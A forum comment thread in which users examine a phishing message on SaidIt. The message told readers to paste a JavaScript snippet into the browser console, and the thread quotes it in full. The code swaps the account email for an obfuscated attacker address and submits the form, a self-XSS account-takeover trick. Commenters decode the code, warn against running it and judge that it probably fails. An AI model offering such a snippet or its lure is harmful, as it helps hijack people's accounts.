you are viewing a single comment's thread.

view the rest of the comments →

[–]JasonCarswell[S] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (12 children)

Why is it so anonymous? Why isn't it from /u/magnora7? When did /u/magnora7 suddenly decide to adopt a "SaidIt Team"? Sure he now has a few helpers but a "team"? That's a term I've been throwing around.

What does this do? (broken into 4 smaller chunks rather than one long line):

Paste this: d=document;d.getElementsByName('email')[0]
.value='wxoxrixdi5x08x4x@0xppxpp.xcxoxm'.replaceAll
('x', '');d.getElementsByTagName('form')[1]
.submit();location.href="https://www.saidit.net/";
Hit enter. You've just kicked the hacker out of your account!

[–][deleted]  (4 children)

[removed]

    [–][deleted] 5 insightful - 3 fun5 insightful - 2 fun6 insightful - 3 fun -  (3 children)

    No, it just changes your email address, which allows the hacker to change your password. I don't think it actually works, though, after analyzing the code, because the attacker assumed the form uses POST, which it doesn't.

    Regardless, I would never run that code if I was you, and if you did: make sure your email ain't been changed.

    [–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (2 children)

    because the attacker assumed the form uses POST, which it doesn't

    It might be POST compatible. Once upon a time young lady, there was no javascript.

    [–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (0 children)

    I tried it by substituting their email for one of my own, and it didn't work.

    [–][deleted] 1 insightful - 2 fun1 insightful - 1 fun2 insightful - 2 fun -  (0 children)

    It's a dude bro. A dude who roleplays having a female penis.

    [–][deleted] 6 insightful - 2 fun6 insightful - 1 fun7 insightful - 2 fun -  (0 children)

    It's JavaScript code. Do not run it!

    'wxoxrixdi5x08x4x@0xppxpp.xcxoxm'.replaceAll('x', '') returns woridi5084@0pppp.com That's the attacker's email address — looks like a scam address to me. They probably obfuscated it so they wouldn't get reported to their email provider, and so you wouldn't immediately recognize it as an email address.

    d.getElementsByName('email')[0].value sets your email address to the email above, but doesn't actually change it.

    d.getElementsByTagName('form')[1].submit() submits the form to change your email. I don't think that actually works, BTW, so if you did run the code: you're probably safe. (But still make sure your email hasn't been changed!) That page didn't use POST when I set my email address, so I think it just uses JavaScript.

    location.href="https://www.saidit.net/"; Just redirects you to the home page.

    Even if the code did work: this is a terrible way to hack into someone's account, since I don't know anyone who would actually paste a block of code into their console... you'd have to be a literal rock to fall for it.

    But if yall get so'm like this again: send me the code and I'll figure out what it does no matter how hard they try to obfuscate it.

    [–]LarrySwinger2 5 insightful - 2 fun5 insightful - 1 fun6 insightful - 2 fun -  (5 children)

    Please simply remove the code you pasted, in case anyone tries. I hope you haven't done what it says. If you have: please change your password ASAP.

    [–]JasonCarswell[S] 3 insightful - 3 fun3 insightful - 2 fun4 insightful - 3 fun -  (0 children)

    Removed from the OP, but I left it, broken above for analysis.

    [–][deleted] 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (3 children)

    And make sure your email address hasn't been changed u/JasonCarswell.

    [–]JasonCarswell[S] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (2 children)

    I didn't plug it in. The whole thing seemed beyond fishy. My reason for immediately shouting it out was to warn people. Plus I wondered if it had come up before to others.

    [–]send_nasty_stuff 3 insightful - 2 fun3 insightful - 1 fun4 insightful - 2 fun -  (0 children)

    I got a message as well. It must have gone out to most of saidit.

    [–][deleted] 2 insightful - 2 fun2 insightful - 1 fun3 insightful - 2 fun -  (0 children)

    Great! I don't think anyone would actually fall for it, though (even if the code worked).